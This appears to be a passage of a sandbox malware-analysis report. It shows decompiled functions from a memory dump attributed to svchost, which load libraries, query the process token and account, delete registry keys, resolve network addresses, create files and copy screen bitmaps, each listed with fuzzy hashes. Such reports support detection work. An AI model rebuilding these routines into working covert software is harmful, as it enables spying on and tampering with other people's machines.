                                                            				_t78 =  *((intOrPtr*)(0x22baf530000 + 0x69590 + __rsi * 8));
                                                            				if (_t78 == 0) goto 0xaf56f9c5;
                                                            				if (_t78 == _t95) goto 0xaf56fa3d;
                                                            				goto 0xaf56fa38;
                                                            				r8d = 0x800;
                                                            				LoadLibraryExW(_t123, _t121, _t118);
                                                            				if (_t72 != 0) goto 0xaf56fa06;
                                                            				if (GetLastError() != 0x57) goto 0xaf56fa04;
                                                            				r8d = 0;
                                                            				LoadLibraryExW(??, ??, ??);
                                                            				_t80 = _t72;
                                                            				goto 0xaf56fa06;
                                                            				if (_t80 != 0) goto 0xaf56fa1f;
                                                            				 *((intOrPtr*)(0x22baf530000 + 0x69590 + __rsi * 8)) = _t95;
                                                            				goto 0xaf56fa3d;
                                                            				_t19 = 0x22baf530000 + 0x69590 + __rsi * 8;
                                                            				_t76 =  *_t19;
                                                            				 *_t19 = _t80;
                                                            				if (_t76 == 0) goto 0xaf56fa38;
                                                            				FreeLibrary(_t115);
                                                            				if (_t80 != 0) goto 0xaf56fa92;
                                                            				if (__r8 + 4 != __r9) goto 0xaf56f9ae;
                                                            				if (_t80 == 0) goto 0xaf56faa2;
                                                            				GetProcAddress(_t94);
                                                            				if (_t76 == 0) goto 0xaf56fa9b;
                                                            				_t109 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				asm("dec eax");
                                                            				 *(0x22baf530000 + 0x69630 + _t121 * 8) = _t76 ^ _t109;
                                                            				goto 0xaf56fabf;
                                                            				goto 0xaf56fa53;
                                                            				_t114 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				asm("dec eax");
                                                            				 *(0x22baf530000 + 0x69630 + _t121 * 8) = _t95 ^ _t114;
                                                            				return 0;
                                                            			}



















                                                            0x22baf56f93c
                                                            0x22baf56f941
                                                            0x22baf56f946
                                                            0x22baf56f958
                                                            0x22baf56f973
                                                            0x22baf56f97a
                                                            0x22baf56f984
                                                            0x22baf56f98c
                                                            0x22baf56f992
                                                            0x22baf56f99b
                                                            0x22baf56f99d
                                                            0x22baf56f9a0
                                                            0x22baf56f9a8
                                                            0x22baf56f9b1
                                                            0x22baf56f9bc
                                                            0x22baf56f9c1
                                                            0x22baf56f9c3
                                                            0x22baf56f9d2
                                                            0x22baf56f9d8
                                                            0x22baf56f9e4
                                                            0x22baf56f9ef
                                                            0x22baf56f9f1
                                                            0x22baf56f9f9
                                                            0x22baf56f9ff
                                                            0x22baf56fa02
                                                            0x22baf56fa10
                                                            0x22baf56fa15
                                                            0x22baf56fa1d
                                                            0x22baf56fa22
                                                            0x22baf56fa22
                                                            0x22baf56fa22
                                                            0x22baf56fa2d
                                                            0x22baf56fa32
                                                            0x22baf56fa3b
                                                            0x22baf56fa44
                                                            0x22baf56fa56
                                                            0x22baf56fa5e
                                                            0x22baf56fa67
                                                            0x22baf56fa69
                                                            0x22baf56fa82
                                                            0x22baf56fa88
                                                            0x22baf56fa90
                                                            0x22baf56fa99
                                                            0x22baf56fa9b
                                                            0x22baf56faaf
                                                            0x22baf56fab5
                                                            0x22baf56fadb

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 717f19dee890c743ff497cff9dc4f55f409a4d8d9a6bbcdf6155fbe71b371401
                                                            • Instruction ID: c227755f3c7d40218253031e27ca7b6bc95c5ad0c7f40cfb6039390f4abc3e88
                                                            • Opcode Fuzzy Hash: 717f19dee890c743ff497cff9dc4f55f409a4d8d9a6bbcdf6155fbe71b371401
                                                            • Instruction Fuzzy Hash: E741A463722A40A1FE779BD6A80C7D673D6BB44BD0F0D49259D2A4B78AFF3AC4458340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BitmapBitsCompatibleCreateDeleteObjectRelease
                                                            • String ID:
                                                            • API String ID: 3052192651-0
                                                            • Opcode ID: cf0a33bfc9bcf8ff794640d93449a68581bc70b957ab1fb0424cdb9c820731d4
                                                            • Instruction ID: 20d06fde2ca8e9f9006e7feb9d7568414f839e8e5567890584a645b6411ba6b3
                                                            • Opcode Fuzzy Hash: cf0a33bfc9bcf8ff794640d93449a68581bc70b957ab1fb0424cdb9c820731d4
                                                            • Instruction Fuzzy Hash: 81312637601790A6E7298B61A85D66DBFE4F385BC1F49C12ADF9607BA2DF39C001C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E0000022B22BAF5478C0(long long __rbx, void* __rcx, void* __rdx, long long _a24) {
                                                            				signed int _v24;
                                                            				char _v536;
                                                            				char _v1048;
                                                            				char _v1056;
                                                            				signed long long _v1064;
                                                            				intOrPtr _v1072;
                                                            				char _v1076;
                                                            				char _v1080;
                                                            				long long _v1096;
                                                            				long long _v1104;
                                                            				long long _v1112;
                                                            				void* __rdi;
                                                            				void* _t48;
                                                            				signed int _t51;
                                                            				void* _t58;
                                                            				void* _t59;
                                                            				signed long long _t68;
                                                            				signed long long _t69;
                                                            				intOrPtr* _t70;
                                                            				signed short* _t75;
                                                            				void* _t78;
                                                            				void* _t95;
                                                            				void* _t97;
                                                            				void* _t98;
                                                            				void* _t101;
                                                            
                                                            				_a24 = __rbx;
                                                            				_t68 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t69 = _t68 ^ _t98 - 0x00000470;
                                                            				_v24 = _t69;
                                                            				_t95 = __rdx;
                                                            				_t78 = __rcx;
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t48, 0, _t58, _t59, __rdx, __rdx, __rdx, _t101);
                                                            				_v1064 = _t69;
                                                            				r8d = 0x200;
                                                            				_v1080 = 0;
                                                            				E0000022B22BAF563830(_t48, 0, _t58, _t59,  &_v1048, __rdx, __rdx, _t101);
                                                            				r8d = 0x200;
                                                            				E0000022B22BAF563830(_t48, 0, _t58, _t59,  &_v536, __rdx, __rdx, _t101);
                                                            				_v1076 = 0x100;
                                                            				_v1072 = 0x100;
                                                            				if (OpenProcessToken(??, ??, ??) == 0) goto 0xaf547a34;
                                                            				r9d = _v1080;
                                                            				_t70 =  &_v1080;
                                                            				r8d = 0;
                                                            				_v1112 = _t70;
                                                            				if (GetTokenInformation(??, ??, ??, ??, ??) != 0) goto 0xaf547986;
                                                            				if (GetLastError() != 0x7a) goto 0xaf547a34;
                                                            				E0000022B22BAF564404(_t70, _t78, _v1064, __rdx);
                                                            				if (_t70 == 0) goto 0xaf547a34;
                                                            				r9d = _v1080;
                                                            				_v1112 =  &_v1080;
                                                            				if (GetTokenInformation(??, ??, ??, ??, ??) == 0) goto 0xaf547a2c;
                                                            				_v1096 =  &_v1056;
                                                            				_v1104 =  &_v1076;
                                                            				_v1112 =  &_v536;
                                                            				if (LookupAccountSidW(??, ??, ??, ??, ??, ??, ??) == 0) goto 0xaf547a2c;
                                                            				_t75 =  &_v1048;
                                                            				_t51 =  *_t75 & 0x0000ffff;
                                                            				 *(_t95 -  &_v1048 + _t75) = _t51;
                                                            				if (_t51 != 0) goto 0xaf547a10;
                                                            				E0000022B22BAF564114(_t51, 1, _t59, _t70,  *_t70, _t97,  &_v1048);
                                                            				goto 0xaf547a36;
                                                            				E0000022B22BAF564114(_t51, 1, _t59, _t70,  *_t70, _t97,  &_v1048);
                                                            				return E0000022B22BAF55A7C0(_t51,  &(_t75[1]), _v24 ^ _t98 - 0x00000470);
                                                            			}




























                                                            0x22baf5478c0
                                                            0x22baf5478cd
                                                            0x22baf5478d4
                                                            0x22baf5478d7
                                                            0x22baf5478df
                                                            0x22baf5478e2
                                                            0x22baf5478ea
                                                            0x22baf5478f0
                                                            0x22baf5478fe
                                                            0x22baf547903
                                                            0x22baf547909
                                                            0x22baf54790d
                                                            0x22baf54791c
                                                            0x22baf547922
                                                            0x22baf54792c
                                                            0x22baf547939
                                                            0x22baf54794c
                                                            0x22baf547952
                                                            0x22baf547957
                                                            0x22baf547961
                                                            0x22baf547964
                                                            0x22baf547975
                                                            0x22baf547980
                                                            0x22baf54798a
                                                            0x22baf547995
                                                            0x22baf54799b
                                                            0x22baf5479b2
                                                            0x22baf5479bf
                                                            0x22baf5479c9
                                                            0x22baf5479da
                                                            0x22baf5479ec
                                                            0x22baf5479f9
                                                            0x22baf547a03
                                                            0x22baf547a10
                                                            0x22baf547a13
                                                            0x22baf547a1e
                                                            0x22baf547a23
                                                            0x22baf547a2a
                                                            0x22baf547a2f
                                                            0x22baf547a56

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Token$Information$AccountErrorLastLookupOpenProcess
                                                            • String ID:
                                                            • API String ID: 2790146286-0
                                                            • Opcode ID: 4af4b1cb74762c26bad3847e56215a2ccb257635a11370a1e329464f09f33fb6
                                                            • Instruction ID: 18b8702f8fffb8a38f5571ac88b08bb28e8ab8fe2453ed2c0d99bfc39d20b376
                                                            • Opcode Fuzzy Hash: 4af4b1cb74762c26bad3847e56215a2ccb257635a11370a1e329464f09f33fb6
                                                            • Instruction Fuzzy Hash: 59411F32218B8496EB618B92F44D7DBB7A1FB89B84F440425DA8D47B5AEF3EC505CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 45%
                                                            			E0000022B22BAF5438E0(void* __rax, void* __rcx, void* __rdx, void* __r9, long long __r15, long long _a8, char _a16, intOrPtr _a24) {
                                                            				intOrPtr _v72;
                                                            				long long _v80;
                                                            				char _v88;
                                                            				long long _v104;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* _t39;
                                                            				void* _t40;
                                                            				void* _t47;
                                                            				void* _t49;
                                                            				long long _t66;
                                                            				void* _t67;
                                                            				long long _t72;
                                                            				intOrPtr* _t74;
                                                            				void* _t76;
                                                            				void* _t77;
                                                            
                                                            				_t47 = __rax;
                                                            				_t74 = __rdx + 1;
                                                            				_v80 = _t74;
                                                            				_t77 = __rdx;
                                                            				_v72 = 0;
                                                            				_t76 = __rcx;
                                                            				r9d = _t49 - 1;
                                                            				_t72 = __r9 + _t74;
                                                            				_v88 = _t72;
                                                            				if (_t72 - _t74 - 4 >= 0) goto 0xaf543929;
                                                            				_v72 = 1;
                                                            				r14d = 0;
                                                            				goto 0xaf543935;
                                                            				r14d =  *_t74;
                                                            				_v80 = _t74 + 4;
                                                            				E0000022B22BAF543530( &_v88);
                                                            				E0000022B22BAF543530( &_v88);
                                                            				_t67 = _t47;
                                                            				if (_v72 != 0) goto 0xaf543a23;
                                                            				_a8 = __r15;
                                                            				_a24 = _t49 + 4;
                                                            				LocalAlloc(??, ??);
                                                            				E0000022B22BAF562BA0(0x40, 0, _t39, _t40, _t47, _t77, _t66, _t67, _t49);
                                                            				_a16 = _t66;
                                                            				r9d = 0x102;
                                                            				_v104 =  &_a16;
                                                            				r8d = 0;
                                                            				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0xaf5439dc;
                                                            				dil = RegDeleteValueW(??, ??) == 0;
                                                            				RegCloseKey(??);
                                                            				r8d = _a24;
                                                            				r9b = 0x3f;
                                                            				 *((intOrPtr*)(_t49 + _t47)) = 0;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t76 + 8)), _t47);
                                                            				LocalFree(??);
                                                            				if (_t47 == 0) goto 0xaf543a16;
                                                            				E0000022B22BAF55A7E4( &_a16, _t47);
                                                            				if (_t67 == 0) goto 0xaf543a23;
                                                            				return E0000022B22BAF55A7E4( &_a16, _t67);
                                                            			}



















                                                            0x22baf5438e0
                                                            0x22baf5438ef
                                                            0x22baf5438f8
                                                            0x22baf5438fd
                                                            0x22baf543900
                                                            0x22baf543904
                                                            0x22baf543907
                                                            0x22baf54390b
                                                            0x22baf54390e
                                                            0x22baf54391a
                                                            0x22baf54391c
                                                            0x22baf543924
                                                            0x22baf543927
                                                            0x22baf543929
                                                            0x22baf543930
                                                            0x22baf54393a
                                                            0x22baf543947
                                                            0x22baf54394c
                                                            0x22baf543953
                                                            0x22baf54395c
                                                            0x22baf54396b
                                                            0x22baf543972
                                                            0x22baf543984
                                                            0x22baf543991
                                                            0x22baf543999
                                                            0x22baf54399f
                                                            0x22baf5439a4
                                                            0x22baf5439b5
                                                            0x22baf5439d2
                                                            0x22baf5439d6
                                                            0x22baf5439dc
                                                            0x22baf5439e4
                                                            0x22baf5439e7
                                                            0x22baf5439f3
                                                            0x22baf5439fb
                                                            0x22baf543a0c
                                                            0x22baf543a11
                                                            0x22baf543a19
                                                            0x22baf543a31

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCloseDeleteFreeOpenValue
                                                            • String ID:
                                                            • API String ID: 3540541088-0
                                                            • Opcode ID: f9ff6769ef9db7efda29f1e2a472c5ab63376ac8a941926aef815ab2caec0977
                                                            • Instruction ID: 4e3c37bff063d5a9af417026a109c5e3f219b6e24068c84c5b7ad2c4f40f0023
                                                            • Opcode Fuzzy Hash: f9ff6769ef9db7efda29f1e2a472c5ab63376ac8a941926aef815ab2caec0977
                                                            • Instruction Fuzzy Hash: 1E318F33724680A6EA32DF62F80D7DAB7A5F785F80F444011EE8A47B5ADF3AC4459B00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 25%
                                                            			E0000022B22BAF54FF80(void* __edx, long long __rbx, void* __rcx, signed short* __r8, void* _a32) {
                                                            				signed int _v32;
                                                            				char _v80;
                                                            				intOrPtr _v88;
                                                            				char _v224;
                                                            				char _v232;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* __rbp;
                                                            				void* _t35;
                                                            				intOrPtr _t38;
                                                            				signed short _t39;
                                                            				void* _t43;
                                                            				void* _t51;
                                                            				void* _t53;
                                                            				signed long long _t62;
                                                            				signed long long _t63;
                                                            				intOrPtr _t67;
                                                            				intOrPtr _t78;
                                                            				long long _t81;
                                                            				void* _t83;
                                                            				void* _t86;
                                                            				void* _t88;
                                                            				void* _t95;
                                                            
                                                            				_t95 = _t88;
                                                            				 *((long long*)(_t95 + 0x20)) = __rbx;
                                                            				_t62 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t63 = _t62 ^ _t88 - 0x000000f0;
                                                            				_v32 = _t63;
                                                            				 *((intOrPtr*)(_t95 - 0x50)) = 0x100;
                                                            				__r8[1] = _t63;
                                                            				__r8[5] = _t63;
                                                            				__r8[9] = _t63;
                                                            				__r8[0xd] = 0;
                                                            				 *(_t95 - 0x4c) = _t63;
                                                            				 *(_t95 - 0x44) = _t63;
                                                            				 *(_t95 - 0x3c) = _t63;
                                                            				 *(_t95 - 0x34) = _t63;
                                                            				 *(_t95 - 0x2c) = _t63;
                                                            				 *((intOrPtr*)(_t95 - 0x24)) = 0;
                                                            				_t15 = _t81 + 3; // 0x3
                                                            				r8d = _t15;
                                                            				 *(_t95 - 0x4c) =  *__r8 & 0x0000ffff;
                                                            				_v232 =  &_v224;
                                                            				 *((long long*)(_t95 - 0x58)) = _t81;
                                                            				_t35 = E0000022B22BAF550680( *__r8 & 0x0000ffff,  &_v232, __rcx, _t86);
                                                            				__imp__getaddrinfo(_t81, _t83, _t86);
                                                            				if (_v232 ==  &_v224) goto 0xaf550038;
                                                            				E0000022B22BAF564114(_t43, 0, _t53, __rbx, __rcx, __r8,  &_v80);
                                                            				if (_t35 == 0) goto 0xaf550048;
                                                            				__imp__#112();
                                                            				goto 0xaf5500ae;
                                                            				_t67 = _v88;
                                                            				_t78 = _t67;
                                                            				if (_t67 == 0) goto 0xaf550085;
                                                            				_t38 =  *((intOrPtr*)(_t78 + 4));
                                                            				if (_t38 == 2) goto 0xaf550070;
                                                            				if (_t38 == 0x17) goto 0xaf550070;
                                                            				if ( *((intOrPtr*)(_t78 + 0x28)) != 0) goto 0xaf550058;
                                                            				goto 0xaf550085;
                                                            				_t39 = E0000022B22BAF562BA0(_t35, 0, _t51, _t53, __r8,  *((intOrPtr*)( *((intOrPtr*)(_t78 + 0x28)) + 0x20)), _t81, __r8,  *((intOrPtr*)( *((intOrPtr*)(_t78 + 0x28)) + 0x10)));
                                                            				__imp__freeaddrinfo();
                                                            				if (1 == 0) goto 0xaf5500a1;
                                                            				__imp__#9();
                                                            				__r8[1] = _t39;
                                                            				goto 0xaf5500ac;
                                                            				__imp__#112();
                                                            				return E0000022B22BAF55A7C0(0x2af9,  &_v224, _v32 ^ _t88 - 0x000000f0);
                                                            			}


























                                                            0x22baf54ff80
                                                            0x22baf54ff83
                                                            0x22baf54ff91
                                                            0x22baf54ff98
                                                            0x22baf54ff9b
                                                            0x22baf54ffa5
                                                            0x22baf54ffad
                                                            0x22baf54ffb3
                                                            0x22baf54ffba
                                                            0x22baf54ffc1
                                                            0x22baf54ffc9
                                                            0x22baf54ffd2
                                                            0x22baf54ffd6
                                                            0x22baf54ffda
                                                            0x22baf54ffde
                                                            0x22baf54ffe2
                                                            0x22baf54ffea
                                                            0x22baf54ffea
                                                            0x22baf54ffee
                                                            0x22baf54fff7
                                                            0x22baf54fffc
                                                            0x22baf550000
                                                            0x22baf55001c
                                                            0x22baf550031
                                                            0x22baf550033
                                                            0x22baf55003a
                                                            0x22baf55003e
                                                            0x22baf550046
                                                            0x22baf550048
                                                            0x22baf550050
                                                            0x22baf550056
                                                            0x22baf550058
                                                            0x22baf55005e
                                                            0x22baf550063
                                                            0x22baf55006c
                                                            0x22baf55006e
                                                            0x22baf55007b
                                                            0x22baf550088
                                                            0x22baf550090
                                                            0x22baf550095
                                                            0x22baf55009b
                                                            0x22baf55009f
                                                            0x22baf5500a6
                                                            0x22baf5500d0

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$freeaddrinfogetaddrinfohtons
                                                            • String ID:
                                                            • API String ID: 1798125793-0
                                                            • Opcode ID: 8ad96b920becc08a0d1341f262c5587ed5e2219b8100b0c7fef9948baf7c5ed3
                                                            • Instruction ID: 5353e29b99af06212770af5e90cbb106684de8f35f0f38a04744d63c2d231038
                                                            • Opcode Fuzzy Hash: 8ad96b920becc08a0d1341f262c5587ed5e2219b8100b0c7fef9948baf7c5ed3
                                                            • Instruction Fuzzy Hash: 4C415D73215B81A6EBB18F91E44C3AE73E5FB88780F458536CA8D4775ADF3AC8588700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 26%
                                                            			E0000022B22BAF535900(void* __edx, void* __rax, void* __rcx, void* __rdx, long long __rsi, signed int __r9, intOrPtr _a8, long long _a16) {
                                                            				long long _v40;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v56;
                                                            				void* __rbx;
                                                            				void* __rdi;
                                                            				intOrPtr _t26;
                                                            				void* _t27;
                                                            				long long _t36;
                                                            				long long _t37;
                                                            				void* _t41;
                                                            				signed long long _t43;
                                                            
                                                            				_t37 = __rsi;
                                                            				_a8 = 0;
                                                            				_t27 = __rdx;
                                                            				if (__rcx + 0x30 == __rdx) goto 0xaf535929;
                                                            				_t43 = __r9 | 0xffffffff;
                                                            				r8d = 0;
                                                            				E0000022B22BAF533E10(__rdx, __rcx + 0x30, __rdx, _t36, __rsi, _t41, _t43);
                                                            				_t26 =  *((intOrPtr*)(_t27 + 0x18));
                                                            				if (_t26 - 8 < 0) goto 0xaf53593c;
                                                            				goto 0xaf53593f;
                                                            				_a16 = _t37;
                                                            				if ( *((short*)(_t27 +  *(_t27 + 0x10) * 2 - 2)) == 0x5c) goto 0xaf5359b2;
                                                            				if (_t26 - 8 < 0) goto 0xaf535957;
                                                            				goto 0xaf53595a;
                                                            				r9d = 0;
                                                            				_v40 = _t36;
                                                            				_v48 = 0x80;
                                                            				_v56 = 3;
                                                            				_t11 = _t43 + 1; // 0x1
                                                            				r8d = _t11;
                                                            				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                                            				if (_t26 != 0xffffffff) goto 0xaf535999;
                                                            				return 0;
                                                            			}














                                                            0x22baf535900
                                                            0x22baf535911
                                                            0x22baf535915
                                                            0x22baf53591b
                                                            0x22baf53591d
                                                            0x22baf535921
                                                            0x22baf535924
                                                            0x22baf535929
                                                            0x22baf535935
                                                            0x22baf53593a
                                                            0x22baf535945
                                                            0x22baf53594a
                                                            0x22baf535950
                                                            0x22baf535955
                                                            0x22baf53595a
                                                            0x22baf53595d
                                                            0x22baf535962
                                                            0x22baf53596f
                                                            0x22baf535977
                                                            0x22baf535977
                                                            0x22baf53597b
                                                            0x22baf535988
                                                            0x22baf535998

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                            • String ID:
                                                            • API String ID: 1503672127-0
                                                            • Opcode ID: 62cf78fbbf138343ebf604fa2ca74deba77003b1a75d362bc1b651a81a33c61c
                                                            • Instruction ID: 594f128c653809d244b4bb1e9b4f2d8b00f6124df376315ea64ded6a212db64d
                                                            • Opcode Fuzzy Hash: 62cf78fbbf138343ebf604fa2ca74deba77003b1a75d362bc1b651a81a33c61c
                                                            • Instruction Fuzzy Hash: C6319E7371064092EB219F6AE42C39A77A1F785FA4F448621DB6A077D9CF39C455C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 31%
                                                            			E0000022B22BAF543B90(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long __r12, long long __r14, long long _a8, char _a16, long long _a24, long long _a32) {
                                                            				intOrPtr _v56;
                                                            				long long _v64;
                                                            				char _v72;
                                                            				long long _v88;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				long _t27;
                                                            				void* _t36;
                                                            				void* _t39;
                                                            				void* _t45;
                                                            				long long _t63;
                                                            				void* _t64;
                                                            				long long _t71;
                                                            				long long _t73;
                                                            				void* _t77;
                                                            				void* _t81;
                                                            
                                                            				_t45 = __rax;
                                                            				_a32 = __rbx;
                                                            				_t73 = __rdx + 1;
                                                            				_v64 = _t73;
                                                            				_t81 = __rdx;
                                                            				_v56 = 0;
                                                            				_t77 = __rcx;
                                                            				r9d = __rbx - 1;
                                                            				_t71 = __r9 + _t73;
                                                            				_v72 = _t71;
                                                            				if (_t71 - _t73 - 4 >= 0) goto 0xaf543bd9;
                                                            				_v56 = 1;
                                                            				goto 0xaf543be5;
                                                            				_v64 = _t73 + 4;
                                                            				E0000022B22BAF543530( &_v72);
                                                            				_t64 = _t45;
                                                            				if (_v56 != 0) goto 0xaf543cc2;
                                                            				_a8 = __r12;
                                                            				r12d = __rbx + 4;
                                                            				_a24 = __r14;
                                                            				LocalAlloc(??, ??);
                                                            				E0000022B22BAF562BA0(0x40, 0, _t36, _t39, _t45, _t81, _t63, _t64, __rbx);
                                                            				_a16 = _t63;
                                                            				r9d = 0x20106;
                                                            				_v88 =  &_a16;
                                                            				r8d = 0;
                                                            				_t27 = RegOpenKeyExW(??, ??, ??, ??, ??);
                                                            				if (_t27 != 0) goto 0xaf543c86;
                                                            				__imp__SHDeleteKeyW();
                                                            				dil = _t27 == 0;
                                                            				RegCloseKey(??);
                                                            				 *((intOrPtr*)(__rbx + _t45)) = 0;
                                                            				r9b = 0x3f;
                                                            				r8d = r12d;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t77 + 8)), _t45);
                                                            				LocalFree(??);
                                                            				if (_t64 == 0) goto 0xaf543cc2;
                                                            				return E0000022B22BAF55A7E4( &_a16, _t64);
                                                            			}



















                                                            0x22baf543b90
                                                            0x22baf543b90
                                                            0x22baf543ba0
                                                            0x22baf543ba9
                                                            0x22baf543bae
                                                            0x22baf543bb1
                                                            0x22baf543bb5
                                                            0x22baf543bb8
                                                            0x22baf543bbc
                                                            0x22baf543bbf
                                                            0x22baf543bcb
                                                            0x22baf543bcd
                                                            0x22baf543bd7
                                                            0x22baf543be0
                                                            0x22baf543bea
                                                            0x22baf543bef
                                                            0x22baf543bf6
                                                            0x22baf543bfc
                                                            0x22baf543c09
                                                            0x22baf543c0d
                                                            0x22baf543c18
                                                            0x22baf543c2a
                                                            0x22baf543c37
                                                            0x22baf543c3f
                                                            0x22baf543c45
                                                            0x22baf543c4a
                                                            0x22baf543c53
                                                            0x22baf543c5b
                                                            0x22baf543c6c
                                                            0x22baf543c7c
                                                            0x22baf543c80
                                                            0x22baf543c86
                                                            0x22baf543c8a
                                                            0x22baf543c91
                                                            0x22baf543c97
                                                            0x22baf543c9f
                                                            0x22baf543cb8
                                                            0x22baf543cd5

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCloseDeleteFreeOpen
                                                            • String ID:
                                                            • API String ID: 3791902735-0
                                                            • Opcode ID: f1d3b093f03b8f0b943f8899a24815629bd0c4f1e6b571d775afd163075c2228
                                                            • Instruction ID: 89ad0e8595374dda59f7569824916a935a157cb20ed676d4fec7671267c0897c
                                                            • Opcode Fuzzy Hash: f1d3b093f03b8f0b943f8899a24815629bd0c4f1e6b571d775afd163075c2228
                                                            • Instruction Fuzzy Hash: EE317E336146D0A2EB31DF52E80C79AB7A5F784B84F408015EE8A47B5ADF3AC559DB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: htons$AddressString
                                                            • String ID:
                                                            • API String ID: 2368566317-0
                                                            • Opcode ID: 9e233e38c0b9bf495a3f2b3d851d5047f6c6fbdbaee85d1634498a1f6c06f5a4
                                                            • Instruction ID: f434f794c306d55e531585c9d4a29f9648fcc00a7912dd84d78409c6c8c38ed5
                                                            • Opcode Fuzzy Hash: 9e233e38c0b9bf495a3f2b3d851d5047f6c6fbdbaee85d1634498a1f6c06f5a4
                                                            • Instruction Fuzzy Hash: 3F31B137204B51A2EB368F55A84C3ADB3B1F794B81F588421DE895779ADF7EC8528340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 27%
                                                            			E0000022B22BAF544830(intOrPtr __edx, long long __rbx, long long __rcx, long long _a8) {
                                                            				long long _v16;
                                                            				char _v24;
                                                            				long long _v32;
                                                            				char _v40;
                                                            				long long _v48;
                                                            				intOrPtr _v56;
                                                            				int _t39;
                                                            				intOrPtr _t40;
                                                            				long long _t63;
                                                            				intOrPtr* _t72;
                                                            				long long _t76;
                                                            				void* _t77;
                                                            
                                                            				_t66 = __rbx;
                                                            				_a8 = __rbx;
                                                            				_t40 = __edx;
                                                            				 *((char*)(__rcx + 0x18)) = 0;
                                                            				_t76 = __rcx;
                                                            				WaitForSingleObject(??, ??);
                                                            				CloseHandle(??);
                                                            				_t72 =  *((intOrPtr*)(__rcx + 0x148));
                                                            				if (_t72 == 0) goto 0xaf544870;
                                                            				_t63 =  *_t72;
                                                            				 *_t63();
                                                            				E0000022B22BAF55A7EC(_t63, _t72);
                                                            				if (__edx != 3) goto 0xaf544887;
                                                            				r8b = 1;
                                                            				goto 0xaf544899;
                                                            				if (__edx != 7) goto 0xaf544894;
                                                            				r8b = 1;
                                                            				goto 0xaf544899;
                                                            				r8d = 0;
                                                            				E0000022B22BAF545190(0x1d8, __edx, __edx - 7, __rbx, _t63, _t77);
                                                            				 *((long long*)(_t76 + 0x148)) = _t63;
                                                            				 *(_t63 + 8) =  *(_t76 + 0x24) & 0x000000ff;
                                                            				_t53 =  ==  ? 0xcc0020 : 0x40cc0020;
                                                            				r9d = 0;
                                                            				r8d = 0;
                                                            				_t15 =  ==  ? 0xcc0020 : 0x40cc0020;
